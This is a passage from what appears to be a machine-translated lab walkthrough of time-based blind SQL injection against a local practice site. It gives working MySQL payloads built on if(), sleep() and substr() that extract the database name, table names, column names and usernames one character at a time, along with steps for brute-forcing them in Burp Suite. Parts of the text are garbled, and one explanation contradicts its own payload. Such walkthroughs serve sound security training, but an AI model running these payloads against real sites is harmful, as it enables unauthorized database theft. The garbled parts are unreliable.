Using the premise,
no bits are displayed on the page, and no $QL statement execution error messages are output.
Both correct SQL statements and incorrect SQL statements return 0 pages. But after adding the s 1 p (5) condition
, the return speed of the page is obviously 5 seconds slower.
advantage.
No display bits are required, no error messages are required.
slow, . Takes a lot of time.
payload:and if(length(database())=8,sleep(10),1) --+
Determine the length of the current database name
If the length of the database name is greater than or equal to 8, the mysql query sleeps for 10 seconds, otherwise the query time is 1
The Repeater module using Burp is as follows:
There is no freeze from 1 to 7, which means that the page does not execute sleep(10), but executes sleep (1)
The length of the current database library name is 8. You can feel the obvious pause instructions to execute sleep(10)
using Burp's Repeater module as follows:
Get the current database library name
Since the library name of the database is generally in the range of az, 0-9, there may be special characters, which are not case-sensitive. Similar to boolean injection, use the substr function to intercept the value of database(), one at a time. Note that it starts from 1, unlike the limit that starts from 0.
payload :and if(substr(database(),1,1)='a',sleep(5),1)
http://www.localhost.com/exam/sql/exam0.php?id=1%27) and if(substr(database(),1,1)='a',sleep(5),1) -- +
Burp blasting is also used here:
packet capture
get table name
and if(substring((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='r',sleep(10),1)
The steps are the same as above using burpsuite, and I will give the results directly here
The emais table comes out the second table
referers second table name
get field name
and if(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='i',sleep(10),1)
As always field name or id should have multiple field names
The second field username
get unsername
and if(substring((select username from security.users limit 0,1),1,1)='D',sleep(10),1) -- 1
The steps are still the same, but note that the length of payload1 in blasting should be at least 40 larger, and the dictionary of payload2 not only has 26 letters but also 10 numbers plus the two characters '{''}'. size
first username
Dumb